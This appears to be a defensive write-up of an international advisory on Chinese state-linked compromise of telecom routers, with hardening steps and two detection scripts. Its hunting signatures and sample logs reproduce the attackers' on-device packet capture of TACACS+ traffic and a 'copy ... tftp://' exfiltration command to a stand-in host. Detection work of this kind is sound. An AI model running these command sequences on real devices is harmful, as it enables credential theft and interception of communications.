China-linked state actors have spent the last several years systematically compromising backbone and edge networking equipment — from provider-edge routers to customer-facing devices — to build a global espionage capability that steals subscriber metadata, intercepts authentication traffic, and creates persistent covert collection paths across peering and transit links. This coordinated international advisory paints a clear and urgent picture: adversaries are weaponizing unpatched, Internet-facing network infrastructure, abusing built-in router features (SPAN/ERSPAN/Embedded Packet Capture, Guest Shell/containers, SNMP, TACACS+/RADIUS) and network trust relationships to capture communications and credentials at scale, and to mirror or redirect customer traffic into actor-controlled collectors.

Background / Overview

The multinational advisory, produced and co‑sealed by major western security agencies, documents intrusions dating back to at least 2021 and identifies a cluster of activity tracked in industry under names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor — hereafter described generically as APT actors. The advisory attributes operations to entities and contractors that provide services to China’s intelligence apparatus, and warns of compromises across telecommunications, government, transportation, lodging, and military-support networks.
Key high‑level findings in the advisory:
  • APT actors preferentially target network-edge and backbone routing infrastructure (PE/CE and core routers) to capture transit and administrative traffic.
  • The actors exploit publicly known CVEs and weak configurations rather than relying on zero‑days, routinely scanning and chaining known vulnerabilities to obtain initial access and escalate privileges.
  • Compromises are persistent and multi-faceted: the actors create local accounts, enable and use on‑device containers (e.g., Guest Shell), create or redirect TACACS+/RADIUS endpoints to actor-controlled servers, configure packet-capture and mirroring sessions, and establish GRE/IPsec tunnels to move data.
This coverage and the recommended mitigations are explicitly targeted at network defenders in telecommunications and critical infrastructure who must assume routers and interconnects are high‑value targets.

Anatomy of the attacks: how APT actors operate

Initial access — exploitation and opportunism

The advisory emphasizes exploitation of publicly known CVEs on Internet-exposed management interfaces and VPN/remote-access features. The APT actors have favored a set of high‑impact bugs in network and VPN appliances; the advisory calls particular attention to a handful of dangerous CVEs that have been observed in active exploit chains.
Independent vendor advisories confirm the seriousness of these vulnerabilities:
  • CVE‑2023‑20198 / CVE‑2023‑20273 (Cisco IOS XE web UI) — Cisco’s investigation concluded CVE‑2023‑20198 can be used to bypass authentication to the web UI, enabling an attacker to create an administrative user; post‑exploit privilege elevation (CVE‑2023‑20273) was then used to write implants to the filesystem. Cisco lists these as critical and documents observed chaining. (sec.cloudapps.cisco.com)
  • CVE‑2018‑0171 (Cisco Smart Install) — A long‑standing Smart Install remote code execution/DoS issue that still presents risk on unpatched, end‑of‑life devices; multiple nation‑state groups have previously weaponized it and vendors continue to urge deactivation/patching. (sec.cloudapps.cisco.com)
  • CVE‑2024‑3400 (PAN‑OS GlobalProtect) — Palo Alto Networks assigned this a 10.0 severity and documented unauthenticated RCE against GlobalProtect in specific configurations; they reported active exploitation and provided hotfixes and mitigation guidance. (securityadvisories.paloaltonetworks.com)
  • CVE‑2024‑21887 (Ivanti Connect Secure / Policy Secure) — Ivanti products have also been repeatedly targeted in the wild; vendors’ security bulletins and the advisory underscore that chaining authentication bypasses and web component issues remain a favored operational path for actors.
These vendor advisories corroborate the advisory’s central claim: attackers prefer fast returns via publicly known, high‑impact CVEs in VPN and router management features rather than exclusive reliance on bespoke zero‑day exploits. (sec.cloudapps.cisco.com, securityadvisories.paloaltonetworks.com)

Persistence and on‑box abuse

Once on a network device, actors use multiple native features to persist and hide:
  • Local account creation, SSH key insertion, and adjustment of ACLs to explicitly allow actor traffic; the advisory notes common naming/numbering patterns actors used when adding ACLs (e.g., “access-list 20”).
  • Enabling management services on non‑standard high ports (e.g., SSH on non‑default 22x22/xxx22 schemes, HTTPS on 18xxx) to avoid simple signature detections.
  • Guest Shell / Linux container usage on Cisco platforms to stage tools, run Python scripts (including publicly available exploit scripts), and conduct collection in an environment that may not be fully monitored by traditional device syslog. The Cisco documentation for Guest Shell (guestshell enable/run/disable/destroy) aligns with the advisory’s descriptions of how containers can be enabled, used for collection, and later destroyed to wipe traces. (test-salesconnect.cisco.com)
  • SNMP SETs and configuration changes to direct TACACS+/RADIUS to actor IPs, mirror interfaces (SPAN/RSPAN/ERSPAN) or to create GRE/IPsec tunnels that ferry copied traffic to external collection points.
These practices have operational effects beyond a single router: they blur provenance in logs (local IPs and management VRF egress can hide actor source addresses), and they enable lateral moves across trust relationships (provider-to-provider peering or provider-to-customer links).

Collection: packet capture and credential harvesting

The actors use native device PCAP functionality and traffic mirroring to capture authentication exchanges (TACACS+, RADIUS), BGP/Routing tables, and targeted customer traffic. The advisory provides concrete command sequences used to create captures (e.g., monitor capture mycap … match tcp any any eq 49; export bootflash:tac.pcap; copy bootflash:tac.pcap tftp://IP) and notes captured PCAP filenames such as mycap.pcap or tac.pcap — details that are directly actionable for threat hunters.
Why this matters: TACACS+ and RADIUS traffic frequently carries administrative authentication. If a device stores the shared secret in weak reversible encoding (Cisco Type 7) or if the operator’s AAA is misconfigured, the adversary can decrypt and re‑use credentials offline, dramatically expanding their foothold.

Exfiltration: peering abuse and tunnel concealment

Rather than using a single, noisy C2 channel, actors frequently:
  • Stage and encrypt archives on compromised systems and transfer them via actor SFTP clients to staging hosts; the advisory enumerates several custom SFTP client binaries (cmd1, cmd3, new2, sft) and includes YARA rules and hashes for detection.
  • Leverage peering links and unmonitored interconnections to move bulk captures across ASNs or to conceal exfiltration in high‑volume NAT/pool traffic, or they tunnel via GRE/IPsec to actor infrastructure.
The practical impact is severe for telecommunications providers: an actor with access to routing edges can collect subscriber metadata and payloads, trace device movement through hospitality/transport networks, and map communications across jurisdictions.

Notable technical confirmations and vendor correlations

  • Cisco’s public advisory confirms the exploitation chain described by the authors: CVE‑2023‑20198 (authentication bypass) was weaponized to create administrative users, and an elevation bug (CVE‑2023‑20273) was used for root‑level implantation — a precise match for the advisory’s observed technique. (sec.cloudapps.cisco.com)
  • Palo Alto’s PSIRT documentation for CVE‑2024‑3400 shows active exploitation against GlobalProtect configurations and explicitly lists hotfixes and mitigation steps; this confirms vendor-level danger and the need for immediate patching on affected PAN‑OS versions. (securityadvisories.paloaltonetworks.com)
  • Cisco product documentation and community resources verify the Guest Shell lifecycle (enable → run bash/python → disable → destroy) and note that Guest Shell uses the management VRF and can run arbitrary Linux tooling — exactly the mechanism described in the advisory for actor staging and evasion. Administrators should treat Guest Shell as a privileged, auditable service. (test-salesconnect.cisco.com, blog.it-playground.eu)
  • Public tool repositories (Stowaway on GitHub) document a ready‑made multi‑hop proxy that maps to the advisory’s description of multi‑hop encrypted relays and SOCKS5 forwarding used by actors to obscure origin and provide operator shells. That tool’s features (multi‑node relays, SOCKS5, port reuse) are consistent with the advisory’s references to STOWAWAY‑style tradecraft. (github.com)
These independent confirmations (vendor advisories plus public tooling) substantiate the advisory’s technical claims about exploited CVEs, container abuse on routers, and multi‑hop proxying.

Threat hunting: prioritized detection playbook

The advisory provides an operational checklist for defenders. The following is a condensed, prioritized playbook that network teams should act on immediately.
  • Inventory & Patch (first 72 hours)
      • Identify all Internet‑facing networking appliances (routers, firewalls, VPN gateways) and confirm firmware/software versions.
      • Prioritize installation of vendor hotfixes for the CVEs flagged in the advisory (CVE‑2023‑20198/CVE‑2023‑20273, CVE‑2018‑0171, CVE‑2024‑3400, CVE‑2024‑21887) and any other known exploited CVEs. Vendor advisories provide fixed releases and hotfix guidance. (sec.cloudapps.cisco.com, securityadvisories.paloaltonetworks.com)
  • Configuration & Management plane hardening
      • Place management services in a dedicated management VRF or out‑of‑band network; apply CoPP / control‑plane ACLs and allowlist management station IPs only.
      • Ensure administrators authenticate to SSH with public‑key authentication, disable password auth where feasible, and require strong ciphers. Audit non‑default high‑port SSH/HTTPS listeners.
  • Visibility & Logging
      • Forward device syslog, AAA command accounting, and Guest Shell/container logs off‑box into an immutable SIEM. Alert on:
          • Creation/start of on‑box packet captures (monitor capture … start, Embedded Packet Capture), especially matches for TACACS+ (TCP/49).
          • New TACACS+/RADIUS server IPs that point outside approved management space.
          • Unexpected SNMP SETs, SPAN/ERSPAN session definitions, or GRE/IPsec tunnel creations transiting peering edges.
  • Hunt for container abuse
      • Search for Guest Shell enablement (guestshell enable/run/disable/destroy), chvrf, dohost usage, and signs of service changes to systemd in XR host OS. Forward container journald logs to SIEM. (test-salesconnect.cisco.com)
  • Detect actor tooling and staging
      • Deploy YARA or file‑hash detection for the SFTP client binaries enumerated in the advisory (e.g., cmd1/cmd3/new2/sft) and monitor for suspicious uploads to external SFTP/TFTP servers.
  • Peering & Routing validation
      • Continuously audit BGP eBGP session filters, AS‑path filters, and maximum‑prefix settings at peering edges to detect unauthorized route steering, and enable TTL security (GTSM) and session protection.

Mitigations — concrete actions (technical)

  • Patch and update immediately: apply vendor fixes for all identified CVEs and prioritize GlobalProtect, Ivanti, Cisco IOS XE/NX‑OS, and other exposed products. Vendor PSIRTs provide exact fixed builds and hotfix guidance. (securityadvisories.paloaltonetworks.com, sec.cloudapps.cisco.com)
  • Disable unnecessary features: disable Cisco Smart Install, Guest Shell (when not required), the sshd_operns service on IOS XR (and verify it is not listening on TCP/57722), and any management HTTP/HTTPS servers unless strictly required and bound to the management VRF.
  • Management plane isolation: place AAA, SNMP, syslog, NetFlow/IPFIX collectors, and jump servers on a dedicated management VRF with strict egress controls; deny default egress and allow only specific collectors.
  • SNMP hardening: use SNMPv3 with authPriv only, change default community strings, restrict SNMP SETs and writable MIBs, and monitor for SNMP SET activity targeting AAA/TACACS+.
  • Logging and telemetry: centralize logs, enable AAA command accounting for privileged CLI actions, and retain logs for a period sufficient for forensic investigation.
  • Routing safeguards: enforce strict BGP filters, maximum prefix limits, and deny default/broad routes on eBGP sessions; monitor for unexpected route changes and policy alterations.
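The configuration items in the list above can be checked mechanically before and after each change window. The script below is an added example, not code from the advisory, CISA or Cisco: it reads an IOS/IOS XE style running-config and flags Smart Install not being explicitly disabled, HTTP/HTTPS management servers, SNMPv1/v2c communities, reversible Type 7 secrets, Guest Shell/IOx enablement, non-default SSH ports, and TACACS+ servers whose address lies outside the approved management space. The sample config, its hostnames, addresses and secrets, and the approved range 10.250.0.0/16 are constructed placeholders.

```python
"""Static audit of a Cisco IOS/IOS XE style running-config for the weak
settings the mitigations above target. Added example (not from the advisory
or any vendor); the config text and address ranges are constructed."""
import ipaddress
import re

# Assumption: the operator's approved AAA/management address space.
# Placeholder range, not a value from the advisory.
APPROVED_MGMT_NETS = [ipaddress.ip_network("10.250.0.0/16")]

# Constructed sample running-config; hostnames, IPs and secrets are placeholders.
SAMPLE_CONFIG = """\
hostname pe-edge-01
ip http server
ip http secure-server
snmp-server community public RW
snmp-server community monitor RO
tacacs server corp-aaa
 address ipv4 10.250.1.10
 key 7 00112233445566
tacacs server rogue-aaa
 address ipv4 203.0.113.45
 key 7 66554433221100
app-hosting appid guestshell
ip ssh port 22222 rotary 1
username netops privilege 15 secret 9 $9$placeholder
"""


def _tacacs_servers(lines):
    """Yield (name, ipv4) pairs from 'tacacs server NAME' sub-mode blocks."""
    name = None
    for line in lines:
        m = re.match(r"^tacacs server (\S+)", line)
        if m:
            name = m.group(1)
        elif name and (m := re.match(r"^\s+address ipv4 (\S+)", line)):
            yield name, m.group(1)
        elif line and not line.startswith(" "):
            name = None  # a top-level line ends the sub-mode block


def audit_config(text):
    """Return a list of (severity, finding) tuples for weak settings."""
    lines = text.splitlines()
    findings = []
    # Smart Install (the CVE-2018-0171 surface) should be explicitly disabled.
    if "no vstack" not in lines:
        findings.append(("high", "Smart Install not explicitly disabled ('no vstack' missing)"))
    for line in lines:
        if line == "ip http server":
            findings.append(("high", "cleartext HTTP management server enabled"))
        elif line == "ip http secure-server":
            findings.append(("medium", "HTTPS web UI enabled; disable unless required and bind to the management VRF"))
        m = re.match(r"^snmp-server community (\S+)\s*(RW|RO)?", line)
        if m:
            sev = "high" if m.group(2) == "RW" else "medium"
            findings.append((sev, f"SNMPv1/v2c community '{m.group(1)}' ({m.group(2) or 'RO'}); move to SNMPv3 authPriv"))
        if re.search(r"\b(key|password) 7 \S+", line):
            findings.append(("high", f"reversible Type 7 secret on line: '{line.strip()}'"))
        if re.search(r"\bguestshell\b", line) or line == "iox":
            findings.append(("medium", f"on-box container enabled: '{line.strip()}'"))
        m = re.match(r"^ip ssh port (\d+)", line)
        if m and m.group(1) != "22":
            findings.append(("medium", f"SSH listening on non-default port {m.group(1)}"))
    for name, addr in _tacacs_servers(lines):
        try:
            ip = ipaddress.ip_address(addr)
            approved = any(ip in net for net in APPROVED_MGMT_NETS)
        except ValueError:
            approved = False  # unparsable address: treat as needing review
        if not approved:
            findings.append(("critical", f"TACACS+ server '{name}' points outside approved management space: {addr}"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit_config(SAMPLE_CONFIG):
        print(f"[{sev:8}] {msg}")
```

Run it against configs pulled through your normal backup path rather than interactively on the device; a clean config that contains `no vstack`, no community strings, no Type 7 secrets and only in-range AAA servers produces an empty list, so the audit can gate change approval.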

Operational considerations and risks

  • Partial remediation risks: the advisory warns that partial or uncoordinated actions can alert persistent operators, causing them to hide activity or pivot to other compromised nodes. Threat response should be planned, coordinated, and — where possible — simultaneous eviction across known compromised environments to avoid tipping adversaries.
  • Cross‑jurisdiction complexity: because actors exploit peering and provider links, remediation often involves multiple operators and national jurisdictions. Telecommunication providers should prepare cross‑party incident response processes and legal channels for coordinated takeover/eviction and evidence collection.
  • Attribution nuance: the advisory attributes activity to China‑aligned groups and lists associated corporate entities cited by the authoring agencies. Those attributions are the view of the participating governments and are relevant to policy response; however, operational detection and mitigation should be guided by technical indicators and proven compromises rather than geopolitical attribution alone. Where the advisory links perpetrators to specific companies, treat that attribution as a government assessment and follow legal/regulatory guidance when acting on it.

The telecom sector: why routers matter more than endpoints

Network edge and backbone devices aggregate massive volumes of sensitive traffic — administrative, signaling, and subscriber sessions. Compromise of these devices enables:
  • Large‑scale passive data collection (PCAP of management/authentication traffic and customer flows).
  • Covert redirection or mirroring of traffic to actor collection points over peering/transit links.
  • Long‑term strategic access to subscriber metadata that can reveal movement, associations, and communications patterns across services and geographies.
For national security, economic espionage, and privacy protection, this class of compromise is high‑impact: defenders must treat router hardening and management‑plane telemetry as top‑tier risk reduction.

Detection signatures and hunting artifacts (practical examples)

  • Hunt for evidence of PCAP commands: monitor logs and commands like:
      • monitor capture mycap interface <if> both
      • monitor capture mycap match ipv4 protocol tcp any any eq 49
      • monitor capture mycap export bootflash:tac.pcap
      • copy bootflash:tac.pcap tftp://<IP>/tac.pcap
    These exact command sequences and filenames (mycap, tac.pcap, 1.pcap) were observed and should be high‑priority alerts.
  • Watch for TCP/57722 flows to IOS XR hosts (sshd_operns) — any unexpected inbound on that port should be treated as high risk. Audit XR host services for sshd_operns and confirm it is disabled unless explicitly required.
  • Detect non‑default management listeners:
      • SSH on port patterns like 22x22 or xxx22
      • HTTPS bound to high ports like 18xxx
      • Alerts when such listeners are reachable from outside the management VRF.
  • File detections: deploy YARA rules or hash lists for SFTP/staging binaries found in the advisory (cmd1/cmd3/new2/sft) and monitor for their execution on any on‑box container or admin workstation.
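The alerts listed under Visibility & Logging in the playbook and the command signatures in this section can be expressed as one hunting pass over AAA command accounting. The script below is an added example, not the advisory's or any vendor's code; the tab-separated records, the users, the device and remote addresses, and the approved range 10.250.0.0/16 are constructed placeholders modelled loosely on TACACS+ accounting output. It flags the monitor capture / export / copy-to-TFTP sequence (a TCP/49 filter and an off-box copy are rated critical), AAA server addresses outside approved space, Guest Shell lifecycle commands, SPAN and GRE tunnel definitions, and non-default SSH/HTTPS ports, then correlates per session so that a capture followed by an off-box copy by the same user raises one chain alert.

```python
"""Hunt over TACACS+ command-accounting records for the capture, AAA-redirect
and listener-change commands described above. Added example (not from the
advisory or any vendor); log format, hosts, users and IPs are constructed."""
import ipaddress
import re
from collections import defaultdict

# Assumption: approved AAA/management address space (placeholder range).
APPROVED_MGMT_NETS = [ipaddress.ip_network("10.250.0.0/16")]

# Constructed records, tab-separated: time, NAS, user, port, remote address,
# start/stop, then cmd=<command>. Modelled loosely on tac_plus accounting.
SAMPLE_ACCOUNTING = "\n".join([
    "2025-09-01T10:02:11Z\t10.250.1.1\tnetops\ttty1\t10.250.9.5\tstop\tcmd=show ip bgp summary",
    "2025-09-01T10:05:40Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=monitor capture mycap interface GigabitEthernet0/0/0 both",
    "2025-09-01T10:05:52Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=monitor capture mycap match ipv4 protocol tcp any any eq 49",
    "2025-09-01T10:06:03Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=monitor capture mycap start",
    "2025-09-01T10:41:19Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=monitor capture mycap export bootflash:tac.pcap",
    "2025-09-01T10:42:07Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=copy bootflash:tac.pcap tftp://203.0.113.9/tac.pcap",
    "2025-09-01T11:10:00Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=tacacs server aaa2",
    "2025-09-01T11:10:05Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=address ipv4 198.51.100.20",
    "2025-09-01T11:12:30Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=guestshell enable",
    "2025-09-01T11:30:00Z\t10.250.1.1\tsvc-backup\ttty2\t203.0.113.9\tstop\tcmd=ip ssh port 22522 rotary 1",
    "2025-09-01T12:00:00Z\t10.250.1.1\tnetops\ttty1\t10.250.9.5\tstop\tcmd=show logging",
])


def _approved(addr):
    """True if addr lies in the approved management space; hostnames need review."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in APPROVED_MGMT_NETS)


RULES = [  # (rule name, severity, pattern over the command text); first match wins
    ("pcap_tacacs_filter", "critical", re.compile(r"^monitor capture .*\beq 49\b")),
    ("pcap_copy_out", "critical", re.compile(r"^copy \S+\.pcap (tftp|ftp|scp|sftp)://")),
    ("pcap_session", "high", re.compile(r"^monitor capture \S+ (interface|match|start)\b")),
    ("pcap_export", "high", re.compile(r"^monitor capture \S+ export ")),
    ("guestshell_lifecycle", "high", re.compile(r"^guestshell (enable|run|disable|destroy)\b")),
    ("span_session", "high", re.compile(r"^monitor session \d+ (source|destination)\b")),
    ("gre_tunnel", "medium", re.compile(r"^tunnel mode gre\b|^interface Tunnel\d+")),
    ("nondefault_ssh_port", "medium", re.compile(r"^ip ssh port (?!22\b)\d+")),
    ("nondefault_https_port", "medium", re.compile(r"^ip http secure-port (?!443\b)\d+")),
]


def parse_record(line):
    """Split one accounting record; returns None for lines that are not records."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) < 7 or not fields[-1].startswith("cmd="):
        return None
    return {"ts": fields[0], "nas": fields[1], "user": fields[2],
            "rem_addr": fields[4], "cmd": fields[-1][4:].strip()}


def hunt(log_text):
    """Return one hit dict per suspicious command plus per-session chain alerts."""
    hits = []
    pending_aaa = set()               # sessions currently inside 'tacacs server' sub-mode
    rules_by_session = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        session = (rec["user"], rec["rem_addr"])
        cmd = rec["cmd"]
        hit = None
        if re.match(r"^tacacs server \S+", cmd):
            pending_aaa.add(session)      # the server address arrives on the next command
            continue
        m = re.match(r"^(address ipv4|tacacs-server host|radius-server host) (\S+)", cmd)
        if m and (session in pending_aaa or not cmd.startswith("address")):
            pending_aaa.discard(session)
            if not _approved(m.group(2)):
                hit = ("aaa_redirect", "critical")
        else:
            for name, sev, rx in RULES:
                if rx.search(cmd):
                    hit = (name, sev)
                    break
        if hit:
            hits.append({**rec, "rule": hit[0], "severity": hit[1]})
            rules_by_session[session].add(hit[0])
    # Correlate: a capture defined or started and then copied off-box in one session.
    for (user, rem), rules in rules_by_session.items():
        if "pcap_copy_out" in rules and rules & {"pcap_session", "pcap_tacacs_filter"}:
            hits.append({"ts": None, "nas": None, "user": user, "rem_addr": rem,
                         "cmd": None, "rule": "capture_exfil_chain", "severity": "critical"})
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_ACCOUNTING):
        print(f"{h['severity']:8} {h['rule']:22} {h['user']}@{h['rem_addr']}  {h['cmd'] or ''}")
```

Adapt parse_record to the field layout your AAA server actually emits, and keep the accounting collector itself on the management VRF: if the device is compromised, the off-box copy of these records is the one an analyst can still trust.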

Conclusion — what defenders must do now

The advisory is a clarion call: network devices are not low‑risk plumbing — they are high‑value targets whose compromise yields asymmetric intelligence returns for state actors. The path forward for network defenders is clear and urgent:
  • Treat vendor advisories and the list of exploited CVEs as operational priorities and patch immediately. (sec.cloudapps.cisco.com, securityadvisories.paloaltonetworks.com)
  • Isolate, harden, and audit the management plane (VRFs, CoPP, AAA, SNMPv3) and maintain end‑to‑end visibility (off‑box logging, AAA accounting, telemetry).
  • Hunt for the concrete indicators and command sequences documented in the advisory (PCAP commands, Guest Shell lifecycle events, TACACS+ redirections, unusual tunnels), and deploy YARA/signature detections for the SFTP/staging tools enumerated.
  • Coordinate across providers and jurisdictions; operator-to-operator cooperation is essential when peering edges or shared infrastructure are implicated.
These measures will not remove every risk overnight, but rapid, prioritized remediation and improved telemetry will significantly raise the cost and complexity of similar campaigns and reduce the window of exposure for critical networks. The advisory’s technical details and vendor confirmations give defenders the concrete signals and fixes needed to act now.

Appendix: key artifacts and signposts to hunt immediately
  • PCAP command strings and filenames (mycap, tac.pcap, 1.pcap).
  • sshd_operns / TCP/57722 listeners on IOS XR hosts.
  • New TACACS+/RADIUS server IPs pointing off‑net.
  • SPAN/RSPAN/ERSPAN session definitions or on‑box packet capture activity.
  • Non‑default SSH/HTTPS listeners with 22x22/18xxx patterns.
  • YARA rules and hashes for SFTP clients (cmd1, cmd3, new2, sft) as enumerated in the advisory.
Caveat on attribution: the advisory includes government attributions and company names associated with the activity. Those assessments inform national policy and response, but individual operators should prioritize verifiable technical indicators and legal channels when responding operationally.
Immediate actions by network operators, combined with vendor patching and international intelligence sharing, are the most reliable way to curtail the long‑term espionage capability described in the advisory and to protect subscriber privacy and critical service integrity.

Source: CISA Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System | CISA
 
